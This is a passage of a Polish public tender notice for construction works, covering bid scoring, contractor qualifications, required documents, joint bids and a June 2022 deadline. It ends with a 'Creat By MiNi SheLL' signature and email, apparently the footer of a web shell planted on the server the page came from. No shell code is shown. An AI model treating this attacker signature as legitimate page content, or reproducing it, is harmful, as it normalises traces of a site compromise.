rozbiórkowe<br/>•	Roboty konstrukcyjne<br/>Warunki na jakich odbywać będzie się udzielanie zamówienia normują zapisy załącznika nr 3</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/><br/>Lp.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1.	Cena (C)	60<br/>2.	Gwarancja i rękojmia na wykonane prace budowlane, wykonczeniowe(G)	40<br/><br/>2.	Ocena ofert zostanie dokonana w oparciu o kryteria wskazane w pkt 1). Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/><br/>Punkty za kryterium „Cena” zostaną obliczone według wzoru: <br/><br/>Cena najniższa brutto<br/>	C = --------------------------------------- x 100% x 60 [pkt.]<br/>Cena oferty badanej brutto<br/><br/>3.	W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku, przy czym zaokrąglenie będzie się odbywać według następującej zasady. Wynik zakończony cyfrą „5” i wyższą zaokrągla się w górę, a wynik zakończony cyfrą niższą niż „5” zaokrągla się w dół.<br/><br/><br/>4.	Punkty za kryterium „Gwarancja i rękojmia na wykonane prace budowlane, wykonczeniowe” wynoszą odpowiednio:<br/><br/>Min 24 m-cy gwarancji – 4 pkt.<br/>28 m-cy gwarancji – 8 pkt.<br/>32 m-cy gwarancji – 12 pkt.<br/>36 m-cy gwarancji - 16pkt.<br/>40 m-cy gwarancji - 20 pkt.<br/>44 m-cy gwarancji -24pkt<br/>48 m-cy gwarancji– 28 pkt<br/>52 m-cy gwarancji – 32 pkt<br/>56 m-cy gwarancji – 36 pkt<br/>60 m-cy gwarancji i więcej – 40 pkt.<br/><br/>Maksymalna ilość punktów w tym kryterium wynosi 40 pkt.<br/>Najniższy możliwy do zaoferowania okres gwarancji w tym kryterium jaki Wykonawca może przedstawić Zamawiającemu stanowi okres 24 miesięcy. Okres podany poniżej tej wartości zostanie potraktowany przez Zmawiającego jako niezgodny z zapisami SWZ, a tym samym oferta potraktowana zostanie jako niezgodna z warunkami zamówienia (art. 226 ust. 1 pkt 5) PZP). W przypadku gdy Wykonawca z własnej inicjatywy zaoferuje okres gwarancji i rękojmi wyższy niż maksymalnie przewidziany zapisami SWZ otrzyma w tym kryterium maksymalnie przewidywaną punktacje nie przekraczającą 40 pkt.<br/><br/>5.	Oferta, która uzyska łącznie największą ilość punktów z wszystkich kryteriów zostanie wybrana jako najkorzystniejsza.<br/>6.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/>7.	Zamawiający w treści oferty poprawi oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>8.	Oferta najkorzystniejsza zostanie wybrana poprzez sumę wszystkich kryteriów<br/><br/>(O) = (C) + (G)<br/><br/>9.	Wykonawca powinien w formularzu ofertowym załącznik nr 2 do SWZ dokonać działania arytmetycznego/sumowania Ceny robót budowlanych oraz mebli, równocześnie uwzględniając przy tym wszystkie części składowe oraz koszty wpływające na realizacje zamówienia, które poniesie Wykonawca w trakcie realizacji. Podając w formularzu łączną cenę ryczałtową brutto.<br/>10.	Cena ryczałtowa oferty brutto musi uwzględniać wszystkie koszty związane z realizacją przedmiotu zamówienia zgodnie z opisem przedmiotu zamówienia oraz postanowieniami umowy i określonymi w niniejszej SWZ <br/><br/>Szczegółowe warunki oceny ofert normuje Rozdział X SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> warunki udziału w postępowaniu:<br/>a)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w ww. zakresie.<br/><br/>b)	dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>c)	dotyczące sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w ww. zakresie.<br/><br/>d)	zdolność techniczna lub zawodowa:<br/>Zamawiający uzna, że Wykonawca spełni warunek: <br/>a.	jeśli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy w tym okresie wykonał : <br/>•	co najmniej jedną robotę budowlaną polegającą na budowie, rozbudowie, nadbudowie przebudowie budynku kubaturowego o wartości brutto min 2 000 000,00 zł<br/><br/>W przypadku oferty składanej wspólnie przez kilku Wykonawców, ocena wymagań określonych w pkt 1 ppkt d) pkt a) będzie dla tych Wykonawców dokonana łącznie, co oznacza, że wystarczające jest by jeden z Wykonawców wykazał się należytym wykonaniem podanej wartości budowy, rozbudowy, nadbudowy, przebudowy budynku kubaturowego. Wartość wykonanych robót budowlanych poszczególnych Wykonawców nie podlega sumowaniu dla osiągnięcia wartości wymaganej przez Zamawiającego.<br/><br/>b.	Dysponuje co najmniej następującymi osobami, które skieruje do realizacji zamówienia posiadającymi niżej wymienione kwalifikacje i doświadczenie.<br/><br/>•	Kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, który w okresie ostatnich 5 lat na co najmniej jednej robocie budowlanej pełnił funkcje kierownika budowy. <br/><br/>•	Kierownik robót w branży sanitarnej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, który w okresie ostatnich 5 lat na co najmniej jednej robocie budowlanej pełnił funkcje kierownika robót w branży sanitarnej. <br/><br/>•	Kierownik robót elektrycznych posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektromagnetycznych który w okresie ostatnich 5 lat na co najmniej jednej robocie budowlanej pełnił funkcje kierownika branży elektrycznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2021 r., poz. 275 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 6 do SWZ;<br/>2.	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3.	Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy (wzór stanowi załącznik nr 4 i 4a do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a)	art. 108 ust. 1 pkt 3) PZP,<br/>b)	art. 108 ust. 1 pkt 4) PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c)	art. 108 ust. 1 pkt 5) PZP, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6) PZP,<br/>4.	Informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1), 2) i 4) PZP sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>6.	Zamawiający samodzielne podejmie weryfikację braku przesłanek o których mowa w rozdziale VII pkt 3 SWZ w stosunku do konkretnego podmiotu. Zamawiający może dokonać tego za pomocą wszelkich dostępnych środków. Jako przykład takich metod weryfikacji można wskazać chociażby ogólnodostępne rejestry takie jak: Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności Gospodarczej czy Centralny Rejestr Beneficjentów Rzeczywistych, lista czy wykaz osób i podmiotów objętych sankcjami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego, prawidłowo i terminowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty(załącznik nr 5 do SWZ),<br/>8.	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. (zał. nr 5a do SWZ)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ust 1 PZP, składa oddzielnie każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia np. łącząc się w konsorcja lub spółki cywilne lub inną formę prawną.<br/>3.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4.	Wykonawcy składający ofertę wspólną wraz z ofertą składają stosowne pełnomocnictwo uprawniające do wykonania określonych czynności w postępowaniu o udzielenie zamówienia publicznego w formie elektronicznej bądź w formie cyfrowego odwzorowania tego dokumentu poświadczonego za zgodność z dokumentem w formie papierowej kwalifikowanym podpisem elektronicznym przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub Notariusza, podpisem zaufanym lub podpisem osobistym mocodawców. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>5.	Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>1)	oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>2)	sposób składania dokumentów w ofercie wspólnej - dokumenty składane przez członków konsorcjum czy wspólników spółki cywilnej, w tym oświadczenia muszą być podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez wyznaczonego pełnomocnika lub osobę upoważnioną do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6.	Zamawiający w toku prowadzonego postępowania będzie przesyłał wszelką korespondencję do pełnomocnika/reprezentanta Wykonawców występujących wspólnie.<br/>7.	Przepisy dotyczące pojedynczego Wykonawcy mają zastosowanie do pełnomocnika, o którym mowa w pkt. 4 i 6 ze skutkiem prawnym wobec wszystkich Wykonawców występujących wspólnie.<br/>8.	Wykonawcy wspólnie ubiegający się o zamówienie na mocy art. 117 ust 4 PZP dołączają do oferty oświadczenie z którego wynika, które roboty budowlane, usługi, bądź dostawy wykonują poszczególni Wykonawcy.<br/><br/>Odnośnie warunków udziału w postepowaniu<br/>W przypadku oferty składanej wspólnie przez kilku Wykonawców, ocena wymagań określonych w pkt 1 ppkt d) pkt a) będzie dla tych Wykonawców dokonana łącznie, co oznacza, że wystarczające jest by jeden z Wykonawców wykazał się należytym wykonaniem podanej wartości budowy, rozbudowy, nadbudowy, przebudowy budynku kubaturowego. Wartość wykonanych robót budowlanych poszczególnych Wykonawców nie podlega sumowaniu dla osiągnięcia wartości wymaganej przez Zamawiającego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian umowy opisany został w § 30 wzoru umowy stanowiącym integralny załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-30 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Podstawy wykluczenia<br/> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę, w stosunku do którego zachodzi którakolwiek z okoliczności, o których mowa w art. 108 ust. 1 pkt.1) – 6), a także w art. 109 ust. 1 pkt 4) ustawy PZP. Wykonawca zobowiązany jest wykazać brak podstaw do wykluczenia w oparciu o przesłanki określone w art. 108 ust. 1 pkt 1) - 6) ustawy PZP. Zamawiający przewiduje wykluczenie Wykonawcy na podstawie przesłanki wskazanej w art. 109 ust. 1 pkt 4) ustawy PZP. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/>3.	Na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022, poz. 835 z późn. zm.) Zamawiający wyklucza z postępowania o udzielenie zamówienia publicznego:<br/>1)	Wykonawcę, którego wymienia wykaz z Rozporządzenia Rady (WE) nr 765/2006 z dnia 18.05.2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE. L z 2006, nr 134, str. 1 z późn. zm.) i Rozporządzenia Rady (UE) nr 269/2014 z dnia 17.03.2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz. Urz. UE. L z 2014, nr 78, str. 6 z późn. zm.)albo lista, na której znalazł się on na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tej ustawy;<br/>2)	Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z 01.03.2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (t. j. Dz. U. z 2022 r., poz. 593 z późn. zm.) jest osoba wymieniona w wykazach z rozporządzenia nr 765/2006 i 269/2014 albo wpisana na liście lub będąca takim beneficjentem rzeczywistym od 24.02.2022 r., o ile została wpisana na listę;<br/>3)	Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z 29.09.1994 r. o rachunkowości, jest podmiot wymieniony w powyższych wykazach albo wpisany na listę lub będący taką jednostką dominującą od 24 .02.2022 r., o ile został wpisany na listę.<br/><br/>5.	Dokumenty od Wykonawców zagranicznych:<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>	informacji z Krajowego Rejestru Karnego, o której mowa w pkt 4) powyżej – składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie, o którym mowa w pkt 4);<br/>	odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w pkt 2), składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.

Creat By MiNi SheLL
Email: jattceo@gmail.com